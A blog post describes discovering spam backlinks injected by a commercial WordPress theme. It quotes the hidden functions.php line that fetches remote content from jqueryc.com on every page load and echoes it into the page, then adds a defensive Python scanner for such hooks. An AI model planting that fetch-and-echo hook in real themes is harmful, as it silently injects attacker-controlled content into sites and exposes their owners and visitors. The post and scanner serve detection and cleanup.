WordPress Hacked: Spam BackLinks

As you may recall, I switched my WordPress theme two months ago and installed a new theme called PixelPower. If you read my previous post, I had disabled W3 Total Cache Minify and replaced it with Better WordPress Minify.

So after successfully implementing the W3 Total Cache minify on another blog I decided to give mine a second chance; the problem I found was that it takes a few seconds for W3TC to write it to disk, and my Amazon CloudFront gets a 404 the first time it tries to hit it … After a second attempt it seems to be working fine.

To my surprise, however, while debugging and looking at my HTML source code I noticed something unusual - WordPress hacked! A bunch of links were injected pointing to care2.com! So I did a little digging and I found that it was a big problem with jQuery being injected by wpstats.org. Not my case, but I did find the problem. Open your functions.php file and if the 2nd line reads:

if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

then your theme will automatically add spam backlinks… What annoys me the most is that I only found out now, after two months with the new template. So if you buy WordPress themes, especially from an unknown source - beware of sneaky spam links added to the original theme.

I deleted said line and all the backlinks disappeared.
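
The same check can be run over a whole themes directory. The following is an added example, not code from the original post or from any theme: a Python scanner that flags PHP callbacks hooked to wp_head or wp_footer which fetch a remote resource and echo it into the page, which is the shape of the line shown above. The function names, regexes and sample strings are constructed for illustration, and the brace matching is a heuristic that ignores braces inside strings.

```python
import re
import sys
from pathlib import Path

HOOK = re.compile(r"add_action\(\s*['\"](wp_head|wp_footer)['\"]\s*,\s*['\"](\w+)['\"]")
FETCH = re.compile(r"\b(?:curl_exec|file_get_contents|wp_remote_get)\s*\(")
ECHO = re.compile(r"\b(?:echo|print)\b")
URL = re.compile(r"['\"](https?://[^'\"\s]+)['\"]")
QUOTES = str.maketrans("\u2018\u2019\u201c\u201d", "''\"\"")

# Constructed samples (not taken from any real theme).
SAMPLE_SUSPICIOUS = """<?php
function load_lib(){ if (function_exists('curl_init')) { $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://cdn.example.invalid/lib.min.js");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); echo curl_exec($ch); } }
add_action('wp_head', 'load_lib');"""
SAMPLE_BENIGN = """<?php
function theme_meta(){ echo '<meta name="generator" content="theme">'; }
add_action('wp_head', 'theme_meta');"""

def function_body(src, name):
    """Source between the braces of function `name` (naive brace matching)."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i]

def scan_source(src):
    """Flag callbacks on wp_head/wp_footer that fetch remotely and echo it."""
    src = src.translate(QUOTES)  # pasted copies often carry typographic quotes
    findings = []
    for hook, func in HOOK.findall(src):
        body = function_body(src, func)
        if FETCH.search(body) and ECHO.search(body):
            findings.append({"hook": hook, "function": func, "urls": URL.findall(body)})
    return findings

def scan_tree(root):
    """Map each *.php file under `root` to its findings, skipping clean files."""
    hits = {str(p): scan_source(p.read_text(errors="replace")) for p in Path(root).rglob("*.php")}
    return {path: found for path, found in hits.items() if found}

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for f in found:
            print(f"{path}: {f['function']} on {f['hook']} fetches {f['urls']}")
```

Run it with the path to wp-content/themes as the only argument; a hit is a reason to read that function by hand, not proof of compromise.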